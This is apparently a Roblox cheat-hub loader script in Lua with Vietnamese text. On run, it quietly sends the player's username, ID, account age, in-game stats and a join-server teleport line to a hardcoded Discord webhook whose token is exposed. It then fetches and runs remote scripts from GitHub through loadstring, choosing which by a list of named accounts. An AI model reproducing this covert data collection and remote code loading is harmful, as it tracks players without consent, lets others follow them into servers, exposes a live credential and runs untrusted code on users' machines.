HttpService = game:GetService("HttpService") 
 Webhook_URL =  "https://discord.com/api/webhooks/1165548495424462928/M5Qru9Sza9QK75S2Ssj9xbF8o5do9Ski-BtKXw2R51Yn6iOS6LgrDcm0TndFDcorCN2P" 
 local ok = request or http_request or (http and http.request) or syn.request 
 ok( 
 { 
 Url = Webhook_URL, 
 Method = 'POST', 
 Headers = { 
 ['Content-Type'] = 'application/json' 
 }, 
 Body = HttpService:JSONEncode({ 
 ["content"] = "", 
 ["embeds"] = {{ 
 ["author"] = { 
 ["name"] = game.Players.LocalPlayer.Name, 
 ["icon"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=100&height=100&format=png" 
 }, 
 ["title"] = ""..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name,
 ["description"] = " ["..game.Players.LocalPlayer.DisplayName.."] Vừa Dùng Test Hub", 
 ["type"] = "rich", 
 ["color"] = tonumber(0xffffff), 
 ["fields"] = { 
 { 
 ["name"] = "🟢Join Sever Người Vừa Dùng VNP Hub {Lưu Ý Phải Vào Game Của Người Vừa Dùng VNP Hub} : Nhấn Giữ Bên Dưới Để Copy Script:", 
 ["value"] = "game:GetService('TeleportService'):TeleportToPlaceInstance(game.PlaceId,'"..game.JobId.."')", 
 ["inline"] = true }, 
 { 
 ["name"] = "Người Dùng ID:", 
 ["value"] = game:GetService("Players").LocalPlayer.UserId, 
 ["inline"] = true }, 
 { 
 ["name"] = "Level:🟢 ", 
 ["value"] = ""..game.Players.LocalPlayer.Data.Levels.Value, 
 ["inline"] = true }, 
 { 
["name"] = "Beli🟢: ", 
 ["value"] = ""..game.Players.LocalPlayer.Data.Belis.Value, 
 ["inline"] = true }, 
 { 
 ["name"] = "Số tuổi của Account:", 
 ["value"] = game:GetService("Players").LocalPlayer.AccountAge, 
 ["inline"] = true } 
 } 
 }} 
 }) 
 })
local find = game.Players 
 local per = game.Players.LocalPlayer.Name  
if find:FindFirstChild("Quanphan01299") or find:FindFirstChild("ginchao12") or find:FindFirstChild("roxblox_1238") or find:FindFirstChild("haurhj") or find:FindFirstChild("mingcc15562") or find:FindFirstChild("NHBD12")  or
find:FindFirstChild("ZzKenKK1") or 
find:FindFirstChild("thinhbietha0ck") or
find:FindFirstChild("Thanhnha161") or
find:FindFirstChild("kogggr139") or
find:FindFirstChild("ngoibui22") then
  if game.PlaceId==4587545091 then   loadstring(game:HttpGet('https://raw.githubusercontent.com/ginchao/Viet-Nam-Piece-1/main/Beta1'))()  
  elseif game.PlaceId==7258239416 then  loadstring(game:HttpGet('https://raw.githubusercontent.com/ginchao/VNP2XPER/main/Second%20Sea'))() 
end
 else 
function find(se)
for i, v in pairs(game.Players:GetChildren()) do
if v.Name == "ginchao12" or v.Name == "Quanphan01299" or v.Name == "ZzKenKK1" or v.Name == "haurhj" or v.Name == "roxblox_1238" or v.Name == "mingcc15562" or v.Name == "thinhbietha0ck" or v.Name == "kogggr139" or v.Name == "ngoibui22" then
se = v.Name
end
end
return se
end
function e(a)
if find() then
game.StarterGui:SetCore("SendNotification", { Title = "Test Hub", Text = "".." ("Có ⭐ Trong Sever") Bạn Hãy Tắt Hub Bật Lại Nếu Muốn Dùng Bản Premium",  Icon = "rbxassetid://6842416695", Duration = 2.5  }) 
end
end
e()
game.Players.PlayerAdded:Connect(function()
e()
end)
 loadstring(game:HttpGet('https://raw.githubusercontent.com/ginchao/VNPxFree2/main/Second%20Sea'))() 
end




